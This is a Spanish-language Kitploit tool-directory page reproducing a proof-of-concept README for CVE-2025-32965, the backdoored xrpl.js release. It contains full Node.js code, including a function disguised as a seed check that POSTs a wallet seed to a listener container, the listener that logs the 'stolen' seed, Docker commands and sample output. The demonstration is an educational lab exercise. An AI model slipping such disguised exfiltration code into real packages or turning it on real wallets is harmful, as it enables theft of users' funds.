Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32965-xrpl-js-poc — CVE Kodu: CVE-2025-32965 Zafiyet Türü: Ataque a la Cadena de Suministro (CWE-506: Código Malicioso Incrustado) Hedef: Versiones 4.2.1–4.2.4 y 2.14.2 de la biblioteca xrpl.js Etki: Envío de los datos de seed/secret de la billetera del usuario al atacante | Kitploit
Herramientas/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosAnálisis de MalwareSeguridad de Cadena de SuministroAprendizaje y Educación
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

CVE Kodu: CVE-2025-32965 Zafiyet Türü: Ataque a la Cadena de Suministro (CWE-506: Código Malicioso Incrustado) Hedef: Versiones 4.2.1–4.2.4 y 2.14.2 de la biblioteca xrpl.js Etki: Envío de los datos de seed/secret de la billetera del usuario al atacante

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32965 — Informe de PoC de Ataque a la Cadena de Suministro de xrpl.js

Descripción de la Vulnerabilidad

  • CVE Code: CVE-2025-32965
  • Tipo de Vulnerabilidad: Ataque a la Cadena de Suministro (CWE-506: Código Malicioso Incrustado)
  • Objetivo: Versiones 4.2.1–4.2.4 y 2.14.2 de la biblioteca xrpl.js
  • Impacto: Envío de la seed/secret de la cartera del usuario al atacante

Objetivo

Este PoC tiene como objetivo demostrar cómo una versión maliciosa de xrpl.js puede realizar una exfiltración de seed en un entorno aislado.

Estructura del Entorno

  • Plataforma: Docker (Ubuntu basado en WSL)
  • Red: Red Docker privada llamada xrplnet
  • Contenedores:
    • poc-listener: Servidor atacante que recolecta los datos de seed
    • xrpl-poc: Contenedor PoC que aloja los scripts de prueba del lado de la víctima

Archivos Utilizados

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed enviada:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Cartera generada:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  SEED ROBADA =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener activo: http://poc-listener:3000/xcm")
})

Pasos

  1. Docker Build:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. Iniciar el Listener:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. Envío de Seed de la Víctima:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

Ejemplo de Salida

Terminal de la Víctima:

root@kitploit:~
  Cartera generada:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed enviada: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Terminal del Atacante:

root@kitploit:~
  Listener activo: http://poc-listener:3000/xcm
  SEED ROBADA => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

Conclusión

Este PoC ha demostrado cómo la vulnerabilidad CVE-2025-32965 puede ser explotada en la práctica. El código de exfiltración de seed de la biblioteca maliciosa xrpl.js se ejecutó con éxito en un entorno de prueba aislado, filtrando datos al servidor del atacante.

Estructura del Repositorio de GitHub (Sugerida)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

Preparado por: Yusuf Dalbudak
Entorno de prueba: WSL2 + Docker + Node.js v20

Descargar herramienta